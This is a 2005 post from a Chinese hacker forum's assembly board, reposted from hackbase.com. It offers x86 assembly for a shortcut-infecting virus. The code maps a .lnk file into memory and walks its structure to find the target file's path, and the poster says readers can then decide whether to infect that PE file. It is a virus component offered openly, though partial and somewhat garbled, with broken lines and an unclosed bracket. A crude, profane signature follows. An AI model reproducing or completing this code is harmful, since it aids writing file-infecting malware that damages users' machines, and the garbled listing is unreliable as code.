[转载]一段感染快捷方式的简短汇编代码

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9805
精华: 768
积分: 40189
阅读权限: 200
性别: 男
在线时间: 3969 小时
注册时间: 2004-7-4
最后登录: 2008-7-24

发短消息
加为好友
当前离线

楼主大中小发表于 2005-10-19 03:29 只看该作者

[转载]一段感染快捷方式的简短汇编代码

信息来源：hackbase.com

复制内容到剪贴板

代码:

push 0 

  

push 80h 

  

push 3 

  

push 0 

  

push 1 

  

push 80000000h 

  

lea eax,filename[ebx] 

  

push eax 

  

call _CreateFile[ebx 

  

cmp eax,INVALID_HANDLE_VALUE 

  

jz infect_lnk_exit 

  

mov hFile,eax 

  

  

  push 

0 

  push 0 

  

push 0 

  

push 2 

  

push 0 

  

push hFile[ebx] 

  

call _CreateFileMapping[ebx] 

  

or eax,eax 

  

jz @1 

  mov 

hMapping[ebx],eax 

  

  

push 0 

  

push 0 

  

push 0 

  

push 4 

  

push hMapping[ebx] 

  

call MapViewOfFile 

  

or eax,eax 

  

jz @2 

  mov 

_pMapping[ebx],eax 

  

  

  mov 

esi,pMapping 

  add 

esi,4ch 

  movzx ecx,word ptr 

[esi] 

  add 

esi,2 

  add 

esi,ecx 

  

  mov 

ecx,[esi+10h] 

  

  add 

esi,ecx

到这里esi就指向快捷方式所指向文件名的地址
后面大家就可以向平常判段PE文件的方法来确定要不要感染这个文件
以上都是我个人的见解应为我是个菜鸟有不对的地方请高手指出

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 各类程序语言{ Program Development } » 机器细语[ ASM ] » [转载]一段感染快捷方式的简短汇编代码